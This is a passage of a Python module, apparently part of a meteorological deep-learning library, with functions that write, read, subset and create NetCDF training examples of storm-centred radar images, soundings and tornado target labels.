"radar_heights_m_agl", and C field-height pairs.
If the examples contain 3-D radar images and no 2-D images:
- Key "radar_image_matrix" is required.
- Each field in "radar_field_names" appears at each height in
"radar_heights_m_agl".
- Thus, there are F_r elements in "radar_field_names", H_r elements in
"radar_heights_m_agl", and F_r * H_r field-height pairs.
:param netcdf_file_name: Path to output file.
:param example_dict: Dictionary with the following keys.
example_dict['full_id_strings']: length-E list of full storm IDs.
example_dict['storm_times_unix_sec']: length-E list of valid times.
example_dict['radar_field_names']: List of radar fields (see general
discussion above).
example_dict['radar_heights_m_agl']: numpy array of radar heights (see
general discussion above).
example_dict['rotated_grids']: Boolean flag. If True, storm-centered radar
grids are rotated so that storm motion is in the +x-direction.
example_dict['rotated_grid_spacing_metres']: Spacing of rotated grids. If
grids are not rotated, this should be None.
example_dict['radar_image_matrix']: See general discussion above. For 2-D
images, this should be a numpy array with dimensions E x M x N x C.
For 3-D images, this should be a numpy array with dimensions
E x M x N x H_r x F_r.
example_dict['reflectivity_image_matrix_dbz']: See general discussion above.
Dimensions should be E x M x N x H_refl x 1, where H_refl = number of
reflectivity heights.
example_dict['az_shear_image_matrix_s01']: See general discussion above.
Dimensions should be E x M x N x F_as, where F_as = number of
azimuthal-shear fields.
example_dict['target_names']: 1-D list with names of target variables. Each
must be accepted by `target_val_utils.target_name_to_params`.
example_dict['target_matrix']: E-by-T numpy array of target values (integer
class labels), where T = number of target variables.
example_dict['sounding_field_names']: list (length F_s) of sounding fields.
Each item must be accepted by `soundings.check_field_name`.
example_dict['sounding_heights_m_agl']: numpy array (length H_s) of sounding
heights (metres above ground level).
example_dict['sounding_matrix']: numpy array (E x H_s x F_s) of storm-
centered soundings.
:param append_to_file: Boolean flag. If True, this method will append to an
existing file. If False, will create a new file, overwriting the
existing file if necessary.
"""
error_checking.assert_is_boolean(append_to_file)
include_soundings = SOUNDING_MATRIX_KEY in example_dict
if append_to_file:
netcdf_dataset = netCDF4.Dataset(
netcdf_file_name, 'a', format='NETCDF3_64BIT_OFFSET'
)
_compare_metadata(
netcdf_dataset=netcdf_dataset, example_dict=example_dict
)
num_examples_orig = len(numpy.array(
netcdf_dataset.variables[STORM_TIMES_KEY][:]
))
num_examples_to_add = len(example_dict[STORM_TIMES_KEY])
this_string_type = 'S{0:d}'.format(
netcdf_dataset.dimensions[STORM_ID_CHAR_DIM_KEY].size
)
example_dict[FULL_IDS_KEY] = netCDF4.stringtochar(numpy.array(
example_dict[FULL_IDS_KEY], dtype=this_string_type
))
for this_key in MAIN_KEYS:
if (this_key not in REQUIRED_MAIN_KEYS and
this_key not in netcdf_dataset.variables):
continue
netcdf_dataset.variables[this_key][
num_examples_orig:(num_examples_orig + num_examples_to_add),
...
] = example_dict[this_key]
netcdf_dataset.close()
return
# Open file.
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
netcdf_dataset = netCDF4.Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')
# Set global attributes.
netcdf_dataset.setncattr(
ROTATED_GRIDS_KEY, int(example_dict[ROTATED_GRIDS_KEY])
)
if example_dict[ROTATED_GRIDS_KEY]:
netcdf_dataset.setncattr(
ROTATED_GRID_SPACING_KEY,
numpy.round(int(example_dict[ROTATED_GRID_SPACING_KEY]))
)
# Set dimensions.
num_storm_id_chars = 10 + numpy.max(
numpy.array([len(s) for s in example_dict[FULL_IDS_KEY]])
)
num_radar_field_chars = numpy.max(
numpy.array([len(f) for f in example_dict[RADAR_FIELDS_KEY]])
)
num_target_name_chars = numpy.max(
numpy.array([len(t) for t in example_dict[TARGET_NAMES_KEY]])
)
num_target_vars = len(example_dict[TARGET_NAMES_KEY])
netcdf_dataset.createDimension(EXAMPLE_DIMENSION_KEY, None)
netcdf_dataset.createDimension(TARGET_VARIABLE_DIM_KEY, num_target_vars)
netcdf_dataset.createDimension(STORM_ID_CHAR_DIM_KEY, num_storm_id_chars)
netcdf_dataset.createDimension(
RADAR_FIELD_CHAR_DIM_KEY, num_radar_field_chars
)
netcdf_dataset.createDimension(
TARGET_NAME_CHAR_DIM_KEY, num_target_name_chars
)
if RADAR_IMAGE_MATRIX_KEY in example_dict:
num_grid_rows = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[1]
num_grid_columns = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[2]
num_radar_dimensions = len(
example_dict[RADAR_IMAGE_MATRIX_KEY].shape) - 2
if num_radar_dimensions == 3:
num_radar_heights = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[3]
num_radar_fields = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[4]
netcdf_dataset.createDimension(
RADAR_FIELD_DIM_KEY, num_radar_fields)
netcdf_dataset.createDimension(
RADAR_HEIGHT_DIM_KEY, num_radar_heights)
else:
num_radar_channels = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[3]
netcdf_dataset.createDimension(
RADAR_CHANNEL_DIM_KEY, num_radar_channels)
netcdf_dataset.createDimension(ROW_DIMENSION_KEY, num_grid_rows)
netcdf_dataset.createDimension(COLUMN_DIMENSION_KEY, num_grid_columns)
else:
num_reflectivity_rows = example_dict[REFL_IMAGE_MATRIX_KEY].shape[1]
num_reflectivity_columns = example_dict[REFL_IMAGE_MATRIX_KEY].shape[2]
num_reflectivity_heights = example_dict[REFL_IMAGE_MATRIX_KEY].shape[3]
num_az_shear_rows = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY].shape[1]
num_az_shear_columns = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY].shape[2]
num_az_shear_fields = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY].shape[3]
netcdf_dataset.createDimension(
REFL_ROW_DIMENSION_KEY, num_reflectivity_rows)
netcdf_dataset.createDimension(
REFL_COLUMN_DIMENSION_KEY, num_reflectivity_columns)
netcdf_dataset.createDimension(
RADAR_HEIGHT_DIM_KEY, num_reflectivity_heights)
netcdf_dataset.createDimension(
AZ_SHEAR_ROW_DIMENSION_KEY, num_az_shear_rows)
netcdf_dataset.createDimension(
AZ_SHEAR_COLUMN_DIMENSION_KEY, num_az_shear_columns)
netcdf_dataset.createDimension(RADAR_FIELD_DIM_KEY, num_az_shear_fields)
num_radar_dimensions = -1
# Add storm IDs.
this_string_type = 'S{0:d}'.format(num_storm_id_chars)
full_ids_char_array = netCDF4.stringtochar(numpy.array(
example_dict[FULL_IDS_KEY], dtype=this_string_type
))
netcdf_dataset.createVariable(
FULL_IDS_KEY, datatype='S1',
dimensions=(EXAMPLE_DIMENSION_KEY, STORM_ID_CHAR_DIM_KEY)
)
netcdf_dataset.variables[FULL_IDS_KEY][:] = numpy.array(full_ids_char_array)
# Add names of radar fields.
this_string_type = 'S{0:d}'.format(num_radar_field_chars)
radar_field_names_char_array = netCDF4.stringtochar(numpy.array(
example_dict[RADAR_FIELDS_KEY], dtype=this_string_type
))
if num_radar_dimensions == 2:
this_first_dim_key = RADAR_CHANNEL_DIM_KEY + ''
else:
this_first_dim_key = RADAR_FIELD_DIM_KEY + ''
netcdf_dataset.createVariable(
RADAR_FIELDS_KEY, datatype='S1',
dimensions=(this_first_dim_key, RADAR_FIELD_CHAR_DIM_KEY)
)
netcdf_dataset.variables[RADAR_FIELDS_KEY][:] = numpy.array(
radar_field_names_char_array)
# Add names of target variables.
this_string_type = 'S{0:d}'.format(num_target_name_chars)
target_names_char_array = netCDF4.stringtochar(numpy.array(
example_dict[TARGET_NAMES_KEY], dtype=this_string_type
))
netcdf_dataset.createVariable(
TARGET_NAMES_KEY, datatype='S1',
dimensions=(TARGET_VARIABLE_DIM_KEY, TARGET_NAME_CHAR_DIM_KEY)
)
netcdf_dataset.variables[TARGET_NAMES_KEY][:] = numpy.array(
target_names_char_array)
# Add storm times.
netcdf_dataset.createVariable(
STORM_TIMES_KEY, datatype=numpy.int32, dimensions=EXAMPLE_DIMENSION_KEY
)
netcdf_dataset.variables[STORM_TIMES_KEY][:] = example_dict[
STORM_TIMES_KEY]
# Add target values.
netcdf_dataset.createVariable(
TARGET_MATRIX_KEY, datatype=numpy.int32,
dimensions=(EXAMPLE_DIMENSION_KEY, TARGET_VARIABLE_DIM_KEY)
)
netcdf_dataset.variables[TARGET_MATRIX_KEY][:] = example_dict[
TARGET_MATRIX_KEY]
# Add radar heights.
if num_radar_dimensions == 2:
this_dimension_key = RADAR_CHANNEL_DIM_KEY + ''
else:
this_dimension_key = RADAR_HEIGHT_DIM_KEY + ''
netcdf_dataset.createVariable(
RADAR_HEIGHTS_KEY, datatype=numpy.int32, dimensions=this_dimension_key
)
netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:] = example_dict[
RADAR_HEIGHTS_KEY]
# Add storm-centered radar images.
if RADAR_IMAGE_MATRIX_KEY in example_dict:
if num_radar_dimensions == 3:
these_dimensions = (
EXAMPLE_DIMENSION_KEY, ROW_DIMENSION_KEY, COLUMN_DIMENSION_KEY,
RADAR_HEIGHT_DIM_KEY, RADAR_FIELD_DIM_KEY
)
else:
these_dimensions = (
EXAMPLE_DIMENSION_KEY, ROW_DIMENSION_KEY, COLUMN_DIMENSION_KEY,
RADAR_CHANNEL_DIM_KEY
)
netcdf_dataset.createVariable(
RADAR_IMAGE_MATRIX_KEY, datatype=numpy.float32,
dimensions=these_dimensions
)
netcdf_dataset.variables[RADAR_IMAGE_MATRIX_KEY][:] = example_dict[
RADAR_IMAGE_MATRIX_KEY]
else:
netcdf_dataset.createVariable(
REFL_IMAGE_MATRIX_KEY, datatype=numpy.float32,
dimensions=(EXAMPLE_DIMENSION_KEY, REFL_ROW_DIMENSION_KEY,
REFL_COLUMN_DIMENSION_KEY, RADAR_HEIGHT_DIM_KEY)
)
netcdf_dataset.variables[REFL_IMAGE_MATRIX_KEY][:] = example_dict[
REFL_IMAGE_MATRIX_KEY][..., 0]
netcdf_dataset.createVariable(
AZ_SHEAR_IMAGE_MATRIX_KEY, datatype=numpy.float32,
dimensions=(EXAMPLE_DIMENSION_KEY, AZ_SHEAR_ROW_DIMENSION_KEY,
AZ_SHEAR_COLUMN_DIMENSION_KEY, RADAR_FIELD_DIM_KEY)
)
netcdf_dataset.variables[AZ_SHEAR_IMAGE_MATRIX_KEY][:] = example_dict[
AZ_SHEAR_IMAGE_MATRIX_KEY]
if not include_soundings:
netcdf_dataset.close()
return
num_sounding_heights = example_dict[SOUNDING_MATRIX_KEY].shape[1]
num_sounding_fields = example_dict[SOUNDING_MATRIX_KEY].shape[2]
num_sounding_field_chars = 1
for j in range(num_sounding_fields):
num_sounding_field_chars = max([
num_sounding_field_chars,
len(example_dict[SOUNDING_FIELDS_KEY][j])
])
netcdf_dataset.createDimension(
SOUNDING_FIELD_DIM_KEY, num_sounding_fields)
netcdf_dataset.createDimension(
SOUNDING_HEIGHT_DIM_KEY, num_sounding_heights)
netcdf_dataset.createDimension(
SOUNDING_FIELD_CHAR_DIM_KEY, num_sounding_field_chars)
this_string_type = 'S{0:d}'.format(num_sounding_field_chars)
sounding_field_names_char_array = netCDF4.stringtochar(numpy.array(
example_dict[SOUNDING_FIELDS_KEY], dtype=this_string_type
))
netcdf_dataset.createVariable(
SOUNDING_FIELDS_KEY, datatype='S1',
dimensions=(SOUNDING_FIELD_DIM_KEY, SOUNDING_FIELD_CHAR_DIM_KEY)
)
netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:] = numpy.array(
sounding_field_names_char_array)
netcdf_dataset.createVariable(
SOUNDING_HEIGHTS_KEY, datatype=numpy.int32,
dimensions=SOUNDING_HEIGHT_DIM_KEY
)
netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:] = example_dict[
SOUNDING_HEIGHTS_KEY]
netcdf_dataset.createVariable(
SOUNDING_MATRIX_KEY, datatype=numpy.float32,
dimensions=(EXAMPLE_DIMENSION_KEY, SOUNDING_HEIGHT_DIM_KEY,
SOUNDING_FIELD_DIM_KEY)
)
netcdf_dataset.variables[SOUNDING_MATRIX_KEY][:] = example_dict[
SOUNDING_MATRIX_KEY]
netcdf_dataset.close()
return
def read_example_file(
netcdf_file_name, read_all_target_vars, target_name=None,
metadata_only=False, targets_only=False, include_soundings=True,
radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None,
sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None,
first_time_to_keep_unix_sec=None, last_time_to_keep_unix_sec=None,
num_rows_to_keep=None, num_columns_to_keep=None,
downsampling_dict=None):
"""Reads examples from NetCDF file.
If `metadata_only == True`, later input args are ignored.
If `targets_only == True`, later input args are ignored.
:param netcdf_file_name: Path to input file.
:param read_all_target_vars: Boolean flag. If True, will read all target
variables. If False, will read only `target_name`. Either way, if
downsampling is done, it will be based only on `target_name`.
:param target_name: Will read this target variable. If
`read_all_target_vars == True` and `downsampling_dict is None`, you can
leave this alone.
:param metadata_only: Boolean flag. If False, this method will read
everything. If True, will read everything except predictor and target
variables.
:param targets_only: Boolean flag. If False, this method will read
everything. If True, will read everything except predictors.
:param include_soundings: Boolean flag. If True and the file contains
soundings, this method will return soundings. Otherwise, no soundings.
:param radar_field_names_to_keep: See doc for `_subset_radar_data`.
:param radar_heights_to_keep_m_agl: Same.
:param sounding_field_names_to_keep: See doc for `_subset_sounding_data`.
:param sounding_heights_to_keep_m_agl: Same.
:param first_time_to_keep_unix_sec: First time to keep. If
`first_time_to_keep_unix_sec is None`, all storm objects will be kept.
:param last_time_to_keep_unix_sec: Last time to keep. If
`last_time_to_keep_unix_sec is None`, all storm objects will be kept.
:param num_rows_to_keep: See doc for `_subset_radar_data`.
:param num_columns_to_keep: Same.
:param downsampling_dict: See doc for `_filter_examples_by_class`.
:return: example_dict: If `read_all_target_vars == True`, dictionary will
have all keys listed in doc for `write_example_file`. If
`read_all_target_vars == False`, key "target_names" will be replaced by
"target_name" and "target_matrix" will be replaced by "target_values".
example_dict['target_name']: Name of target variable.
example_dict['target_values']: length-E list of target values (integer
class labels), where E = number of examples.
"""
# TODO(thunderhoser): Allow this method to read only soundings without radar
# data.
if (
target_name ==
'tornado_lead-time=0000-3600sec_distance=00000-10000m'
):
target_name = (
'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
)
error_checking.assert_is_boolean(read_all_target_vars)
error_checking.assert_is_boolean(include_soundings)
error_checking.assert_is_boolean(metadata_only)
error_checking.assert_is_boolean(targets_only)
example_dict, netcdf_dataset = _read_metadata_from_example_file(
netcdf_file_name=netcdf_file_name, include_soundings=include_soundings)
need_main_target_values = (
not read_all_target_vars
or downsampling_dict is not None
)
if need_main_target_values:
target_index = example_dict[TARGET_NAMES_KEY].index(target_name)
else:
target_index = -1
if not read_all_target_vars:
example_dict[TARGET_NAME_KEY] = target_name
example_dict.pop(TARGET_NAMES_KEY)
if metadata_only:
netcdf_dataset.close()
return example_dict
if need_main_target_values:
main_target_values = numpy.array(
netcdf_dataset.variables[TARGET_MATRIX_KEY][:, target_index],
dtype=int
)
else:
main_target_values = None
if read_all_target_vars:
example_dict[TARGET_MATRIX_KEY] = numpy.array(
netcdf_dataset.variables[TARGET_MATRIX_KEY][:], dtype=int
)
else:
example_dict[TARGET_VALUES_KEY] = main_target_values
# Subset by time.
if first_time_to_keep_unix_sec is None:
first_time_to_keep_unix_sec = 0
if last_time_to_keep_unix_sec is None:
last_time_to_keep_unix_sec = int(1e12)
error_checking.assert_is_integer(first_time_to_keep_unix_sec)
error_checking.assert_is_integer(last_time_to_keep_unix_sec)
error_checking.assert_is_geq(
last_time_to_keep_unix_sec, first_time_to_keep_unix_sec)
example_indices_to_keep = numpy.where(numpy.logical_and(
example_dict[STORM_TIMES_KEY] >= first_time_to_keep_unix_sec,
example_dict[STORM_TIMES_KEY] <= last_time_to_keep_unix_sec
))[0]
if downsampling_dict is not None:
subindices_to_keep = _filter_examples_by_class(
target_values=main_target_values[example_indices_to_keep],
downsampling_dict=downsampling_dict
)
elif not read_all_target_vars:
subindices_to_keep = numpy.where(
main_target_values[example_indices_to_keep] !=
target_val_utils.INVALID_STORM_INTEGER
)[0]
else:
subindices_to_keep = numpy.linspace(
0, len(example_indices_to_keep) - 1,
num=len(example_indices_to_keep), dtype=int
)
example_indices_to_keep = example_indices_to_keep[subindices_to_keep]
if len(example_indices_to_keep) == 0:
return None
example_dict[FULL_IDS_KEY] = [
example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep
]
example_dict[STORM_TIMES_KEY] = (
example_dict[STORM_TIMES_KEY][example_indices_to_keep]
)
if read_all_target_vars:
example_dict[TARGET_MATRIX_KEY] = (
example_dict[TARGET_MATRIX_KEY][example_indices_to_keep, :]
)
else:
example_dict[TARGET_VALUES_KEY] = (
example_dict[TARGET_VALUES_KEY][example_indices_to_keep]
)
if targets_only:
netcdf_dataset.close()
return example_dict
example_dict = _subset_radar_data(
example_dict=example_dict, netcdf_dataset_object=netcdf_dataset,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=radar_field_names_to_keep,
heights_to_keep_m_agl=radar_heights_to_keep_m_agl,
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
if not include_soundings:
netcdf_dataset.close()
return example_dict
example_dict = _subset_sounding_data(
example_dict=example_dict, netcdf_dataset_object=netcdf_dataset,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=sounding_field_names_to_keep,
heights_to_keep_m_agl=sounding_heights_to_keep_m_agl)
netcdf_dataset.close()
return example_dict
def read_specific_examples(
netcdf_file_name, read_all_target_vars, full_storm_id_strings,
storm_times_unix_sec, target_name=None, include_soundings=True,
radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None,
sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None,
num_rows_to_keep=None, num_columns_to_keep=None):
"""Reads specific examples (with specific ID-time pairs) from NetCDF file.
:param netcdf_file_name: Path to input file.
:param read_all_target_vars: See doc for `read_example_file`.
:param full_storm_id_strings: length-E list of storm IDs.
:param storm_times_unix_sec: length-E numpy array of valid times.
:param target_name: See doc for `read_example_file`.
:param metadata_only: Same.
:param include_soundings: Same.
:param radar_field_names_to_keep: Same.
:param radar_heights_to_keep_m_agl: Same.
:param sounding_field_names_to_keep: Same.
:param sounding_heights_to_keep_m_agl: Same.
:param num_rows_to_keep: Same.
:param num_columns_to_keep: Same.
:return: example_dict: See doc for `write_example_file`.
"""
if (
target_name ==
'tornado_lead-time=0000-3600sec_distance=00000-10000m'
):
target_name = (
'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
)
error_checking.assert_is_boolean(read_all_target_vars)
error_checking.assert_is_boolean(include_soundings)
example_dict, dataset_object = _read_metadata_from_example_file(
netcdf_file_name=netcdf_file_name, include_soundings=include_soundings)
example_indices_to_keep = tracking_utils.find_storm_objects(
all_id_strings=example_dict[FULL_IDS_KEY],
all_times_unix_sec=example_dict[STORM_TIMES_KEY],
id_strings_to_keep=full_storm_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False
)
example_dict[FULL_IDS_KEY] = [
example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep
]
example_dict[STORM_TIMES_KEY] = example_dict[STORM_TIMES_KEY][
example_indices_to_keep]
if read_all_target_vars:
example_dict[TARGET_MATRIX_KEY] = numpy.array(
dataset_object.variables[TARGET_MATRIX_KEY][
example_indices_to_keep, :],
dtype=int
)
else:
target_index = example_dict[TARGET_NAMES_KEY].index(target_name)
example_dict[TARGET_NAME_KEY] = target_name
example_dict.pop(TARGET_NAMES_KEY)
example_dict[TARGET_VALUES_KEY] = numpy.array(
dataset_object.variables[TARGET_MATRIX_KEY][
example_indices_to_keep, target_index],
dtype=int
)
example_dict = _subset_radar_data(
example_dict=example_dict, netcdf_dataset_object=dataset_object,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=radar_field_names_to_keep,
heights_to_keep_m_agl=radar_heights_to_keep_m_agl,
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
if not include_soundings:
dataset_object.close()
return example_dict
example_dict = _subset_sounding_data(
example_dict=example_dict, netcdf_dataset_object=dataset_object,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=sounding_field_names_to_keep,
heights_to_keep_m_agl=sounding_heights_to_keep_m_agl)
dataset_object.close()
return example_dict
def reduce_examples_3d_to_2d(example_dict, list_of_operation_dicts):
"""Reduces examples from 3-D to 2-D.
If the examples contain both 2-D azimuthal-shear images and 3-D
reflectivity images:
- Keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01" are
required.
- "radar_heights_m_agl" should contain only reflectivity heights.
- "radar_field_names" should contain only the names of azimuthal-shear
fields.
If the examples contain 3-D radar images and no 2-D images:
- Key "radar_image_matrix" is required.
- Each field in "radar_field_names" appears at each height in
"radar_heights_m_agl".
- Thus, there are F_r elements in "radar_field_names", H_r elements in
"radar_heights_m_agl", and F_r * H_r field-height pairs.
After dimensionality reduction (from 3-D to 2-D):
- Keys "reflectivity_image_matrix_dbz", "az_shear_image_matrix_s01", and
"radar_heights_m_agl" will be absent.
- Key "radar_image_matrix" will be present. The dimensions will be
E x M x N x C.
- Key "radar_field_names" will be a length-C list, where the [j]th item is
the field name for the [j]th channel of radar_image_matrix
(radar_image_matrix[..., j]).
- Key "min_radar_heights_m_agl" will be a length-C numpy array, where the
[j]th item is the MINIMUM height for the [j]th channel of
radar_image_matrix.
- Key "max_radar_heights_m_agl" will be a length-C numpy array, where the
[j]th item is the MAX height for the [j]th channel of radar_image_matrix.
- Key "radar_layer_operation_names" will be a length-C list, where the [j]th
item is the name of the operation used to create the [j]th channel of
radar_image_matrix.
:param example_dict: See doc for `write_example_file`.
:param list_of_operation_dicts: See doc for `_check_layer_operation`.
:return: example_dict: See general discussion above, for how the input
`example_dict` is changed to the output `example_dict`.
"""
if RADAR_IMAGE_MATRIX_KEY in example_dict:
num_radar_dimensions = len(
example_dict[RADAR_IMAGE_MATRIX_KEY].shape
) - 2
assert num_radar_dimensions == 3
new_radar_image_matrix = None
new_field_names = []
new_min_heights_m_agl = []
new_max_heights_m_agl = []
new_operation_names = []
if AZ_SHEAR_IMAGE_MATRIX_KEY in example_dict:
new_radar_image_matrix = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] + 0.
for this_field_name in example_dict[RADAR_FIELDS_KEY]:
new_field_names.append(this_field_name)
new_operation_names.append(MAX_OPERATION_NAME)
if this_field_name == radar_utils.LOW_LEVEL_SHEAR_NAME:
new_min_heights_m_agl.append(0)
new_max_heights_m_agl.append(2000)
else:
new_min_heights_m_agl.append(3000)
new_max_heights_m_agl.append(6000)
for this_operation_dict in list_of_operation_dicts:
this_new_matrix, this_operation_dict = _apply_layer_operation(
example_dict=example_dict, operation_dict=this_operation_dict)
this_new_matrix = numpy.expand_dims(this_new_matrix, axis=-1)
if new_radar_image_matrix is None:
new_radar_image_matrix = this_new_matrix + 0.
else:
new_radar_image_matrix = numpy.concatenate(
(new_radar_image_matrix, this_new_matrix), axis=-1
)
new_field_names.append(this_operation_dict[RADAR_FIELD_KEY])
new_min_heights_m_agl.append(this_operation_dict[MIN_HEIGHT_KEY])
new_max_heights_m_agl.append(this_operation_dict[MAX_HEIGHT_KEY])
new_operation_names.append(this_operation_dict[OPERATION_NAME_KEY])
example_dict.pop(REFL_IMAGE_MATRIX_KEY, None)
example_dict.pop(AZ_SHEAR_IMAGE_MATRIX_KEY, None)
example_dict.pop(RADAR_HEIGHTS_KEY, None)
example_dict[RADAR_IMAGE_MATRIX_KEY] = new_radar_image_matrix
example_dict[RADAR_FIELDS_KEY] = new_field_names
example_dict[MIN_RADAR_HEIGHTS_KEY] = numpy.array(
new_min_heights_m_agl, dtype=int)
example_dict[MAX_RADAR_HEIGHTS_KEY] = numpy.array(
new_max_heights_m_agl, dtype=int)
example_dict[RADAR_LAYER_OPERATION_NAMES_KEY] = new_operation_names
return example_dict
def create_examples(
target_file_names, target_names, num_examples_per_in_file,
top_output_dir_name, radar_file_name_matrix=None,
reflectivity_file_name_matrix=None, az_shear_file_name_matrix=None,
downsampling_dict=None, target_name_for_downsampling=None,
sounding_file_names=None):
"""Creates many input examples.
If `radar_file_name_matrix is None`, both `reflectivity_file_name_matrix`
and `az_shear_file_name_matrix` must be specified.
D = number of SPC dates in time period
:param target_file_names: length-D list of paths to target files (will be
read by `read_labels_from_netcdf`).
:param target_names: See doc for `_check_target_vars`.
:param num_examples_per_in_file: Number of examples to read from each input
file.
:param top_output_dir_name: Name of top-level directory. Files will be
written here by `write_example_file`, to locations determined by
`find_example_file`.
:param radar_file_name_matrix: numpy array created by either
`find_storm_images_2d` or `find_storm_images_3d`. Length of the first
axis is D.
:param reflectivity_file_name_matrix: numpy array created by
`find_storm_images_2d3d_myrorss`. Length of the first axis is D.
:param az_shear_file_name_matrix: Same.
:param downsampling_dict: See doc for `deep_learning_utils.sample_by_class`.
If None, there will be no downsampling.
:param target_name_for_downsampling:
[used only if `downsampling_dict is not None`]
Name of target variable to use for downsampling.
:param sounding_file_names: length-D list of paths to sounding files (will
be read by `soundings.read_soundings`). If None, will not include
soundings.
"""
_check_target_vars(target_names)
num_target_vars = len(target_names)
if radar_file_name_matrix is None:
error_checking.assert_is_numpy_array(
reflectivity_file_name_matrix, num_dimensions=2)
num_file_times = reflectivity_file_name_matrix.shape[0]
these_expected_dim = numpy.array([num_file_times, 2], dtype=int)
error_checking.assert_is_numpy_array(
az_shear_file_name_matrix, exact_dimensions=these_expected_dim)
else:
error_checking.assert_is_numpy_array(radar_file_name_matrix)
num_file_dimensions = len(radar_file_name_matrix.shape)
num_file_times = radar_file_name_matrix.shape[0]
error_checking.assert_is_geq(num_file_dimensions, 2)
error_checking.assert_is_leq(num_file_dimensions, 3)
these_expected_dim = numpy.array([num_file_times], dtype=int)
error_checking.assert_is_numpy_array(
numpy.array(target_file_names), exact_dimensions=these_expected_dim
)
if sounding_file_names is not None:
error_checking.assert_is_numpy_array(
numpy.array(sounding_file_names),
exact_dimensions=these_expected_dim
)
error_checking.assert_is_integer(num_examples_per_in_file)
error_checking.assert_is_geq(num_examples_per_in_file, 1)
full_id_strings = []
storm_times_unix_sec = numpy.array([], dtype=int)
target_matrix = None
for i in range(num_file_times):
print('Reading data from: "{0:s}"...'.format(target_file_names[i]))
this_target_dict = target_val_utils.read_target_values(
netcdf_file_name=target_file_names[i], target_names=target_names)
full_id_strings += this_target_dict[target_val_utils.FULL_IDS_KEY]
storm_times_unix_sec = numpy.concatenate((
storm_times_unix_sec,
this_target_dict[target_val_utils.VALID_TIMES_KEY]
))
if target_matrix is None:
target_matrix = (
this_target_dict[target_val_utils.TARGET_MATRIX_KEY] + 0
)
else:
target_matrix = numpy.concatenate(
(target_matrix,
this_target_dict[target_val_utils.TARGET_MATRIX_KEY]),
axis=0
)
print('\n')
num_examples_found = len(full_id_strings)
num_examples_to_use = num_examples_per_in_file * num_file_times
if downsampling_dict is None:
indices_to_keep = numpy.linspace(
0, num_examples_found - 1, num=num_examples_found, dtype=int)
if num_examples_found > num_examples_to_use:
indices_to_keep = numpy.random.choice(
indices_to_keep, size=num_examples_to_use, replace=False)
else:
downsampling_index = target_names.index(target_name_for_downsampling)
indices_to_keep = dl_utils.sample_by_class(
sampling_fraction_by_class_dict=downsampling_dict,
target_name=target_name_for_downsampling,
target_values=target_matrix[:, downsampling_index],
num_examples_total=num_examples_to_use)
full_id_strings = [full_id_strings[k] for k in indices_to_keep]
storm_times_unix_sec = storm_times_unix_sec[indices_to_keep]
target_matrix = target_matrix[indices_to_keep, :]
for j in range(num_target_vars):
these_unique_classes, these_unique_counts = numpy.unique(
target_matrix[:, j], return_counts=True
)
for k in range(len(these_unique_classes)):
print((
'Number of examples with "{0:s}" in class {1:d} = {2:d}'
).format(
target_names[j], these_unique_classes[k], these_unique_counts[k]
))
print('\n')
first_spc_date_string = time_conversion.time_to_spc_date_string(
numpy.min(storm_times_unix_sec)
)
last_spc_date_string = time_conversion.time_to_spc_date_string(
numpy.max(storm_times_unix_sec)
)
spc_date_strings = time_conversion.get_spc_dates_in_range(
first_spc_date_string=first_spc_date_string,
last_spc_date_string=last_spc_date_string)
spc_date_to_out_file_dict = {}
for this_spc_date_string in spc_date_strings:
this_file_name = find_example_file(
top_directory_name=top_output_dir_name, shuffled=False,
spc_date_string=this_spc_date_string,
raise_error_if_missing=False)
if os.path.isfile(this_file_name):
os.remove(this_file_name)
spc_date_to_out_file_dict[this_spc_date_string] = this_file_name
for i in range(num_file_times):
if radar_file_name_matrix is None:
this_file_name = reflectivity_file_name_matrix[i, 0]
else:
this_file_name = numpy.ravel(radar_file_name_matrix[i, ...])[0]
this_time_unix_sec, this_spc_date_string = (
storm_images.image_file_name_to_time(this_file_name)
)
if this_time_unix_sec is None:
this_first_time_unix_sec = (
time_conversion.get_start_of_spc_date(this_spc_date_string)
)
this_last_time_unix_sec = (
time_conversion.get_end_of_spc_date(this_spc_date_string)
)
else:
this_first_time_unix_sec = this_time_unix_sec + 0
this_last_time_unix_sec = this_time_unix_sec + 0
these_indices = numpy.where(
numpy.logical_and(
storm_times_unix_sec >= this_first_time_unix_sec,
storm_times_unix_sec <= this_last_time_unix_sec)
)[0]
if len(these_indices) == 0:
continue
these_full_id_strings = [full_id_strings[m] for m in these_indices]
these_storm_times_unix_sec = storm_times_unix_sec[these_indices]
this_target_matrix = target_matrix[these_indices, :]
if sounding_file_names is None:
this_sounding_file_name = None
else:
this_sounding_file_name = sounding_file_names[i]
if radar_file_name_matrix is None:
this_example_dict = _create_2d3d_examples_myrorss(
azimuthal_shear_file_names=az_shear_file_name_matrix[
i, ...].tolist(),
reflectivity_file_names=reflectivity_file_name_matrix[
i, ...].tolist(),
full_id_strings=these_full_id_strings,
